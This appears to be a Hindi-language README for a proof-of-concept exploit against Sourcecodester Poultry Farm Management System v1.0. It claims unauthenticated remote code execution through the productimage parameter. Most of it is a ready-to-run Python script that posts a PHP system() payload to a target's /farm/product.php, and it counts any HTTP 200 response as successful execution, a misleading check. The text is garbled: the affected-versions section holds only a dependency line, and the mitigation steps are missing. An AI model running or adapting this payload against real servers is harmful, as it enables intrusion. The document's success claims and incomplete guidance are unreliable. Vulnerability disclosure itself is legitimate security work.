
प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट अप्रमाणित रिमोट कोड निष्पादन के लिए Sourcecodester Poultry Farm Management System v1.0 में productimage पैरामीटर के माध्यम से।
यह रिपॉजिटरी Sourcecodester Poultry Farm Management System v1.0 में एक बिना प्रमाणीकरण के रिमोट कोड निष्पादन (RCE) कमजोरी को प्रदर्शित करने वाली एक प्रूफ ऑफ कॉन्सेप्ट (PoC) स्क्रिप्ट प्रदान करती है। यह कमजोरी /farm/product.php पर productimage पैरामीटर में मौजूद है, जो एक हमलावर को सर्वर पर मनमाना कोड निष्पादित करने की अनुमति देती है।
CVE-ID: (लंबित)
अवलोकन:
Sourcecodester Poultry Farm Management System v1.0 में /farm/product.php पर productimage पैरामीटर के माध्यम से एक बिना प्रमाणीकरण के रिमोट कोड निष्पादन (RCE) कमजोरी मौजूद है। यह कमजोरी एक हमलावर को बिना प्रमाणीकरण के सर्वर पर मनमाना कोड निष्पादित करने की अनुमति देती है।
प्रभावित संस्करण:
requests लाइब्रेरी (pip install requests)यह स्क्रिप्ट दर्शाती है कि कैसे एक हमलावर कमजोर पैरामीटर पर एक दुर्भावनापूर्ण अनुरोध भेजकर RCE कमजोरी का शोषण कर सकता है।
निम्नलिखित स्क्रिप्ट को rce_poc.py के रूप में सहेजें और इसे चलाएँ।
import requests
# Configuration
target_url = "http://target-url/farm/product.php" # Change this to the target URL
# Malicious payload
# The payload should be a command that the server can execute, e.g., 'ls' to list directory contents
# Here, we are using a simple PHP payload to demonstrate the RCE
payload = "<?php system('ls'); ?>"
# Construct the malicious request
data = {
'productimage': payload # The vulnerable parameter
}
def exploit_rce(url, data):
"""
Exploit the RCE vulnerability by sending a malicious request to the target URL.
Args:
url (str): The target URL.
data (dict): The data to be sent in the POST request.
"""
try:
response = requests.post(url, data=data)
# Print the response details
print("Status Code:", response.status_code)
print("Response Body:", response.text)
if response.status_code == 200:
print("[+] Successfully executed the payload.")
else:
print("[-] Failed to execute the payload.")
except requests.RequestException as e:
print(f"[-] An error occurred: {e}")
if __name__ == "__main__":
print(f"Sending malicious request to: {target_url}")
exploit_rce(target_url, data)
target_url को कमजोर सर्वर के /farm/product.php एंडपॉइंट के URL पर सेट करें।productimage पैरामीटर में दुर्भावनापूर्ण पेलोड के साथ एक POST अनुरोध बनाती है।exploit_rce() फंक्शन लक्ष्य URL पर दुर्भावनापूर्ण अनुरोध भेजता है और प्रतिक्रिया विवरण प्रिंट करता है।इस कमजोरी को कम करने के लिए, निम्नलिखित कदम उठाएँ:
इन शमन उपायों और सुरक्षा सर्वोत्तम प्रथाओं का पालन करके, आप Sourcecodester Poultry Farm Management System v1.0 में इस RCE समस्या जैसी कमजोरियों को रोक सकते हैं।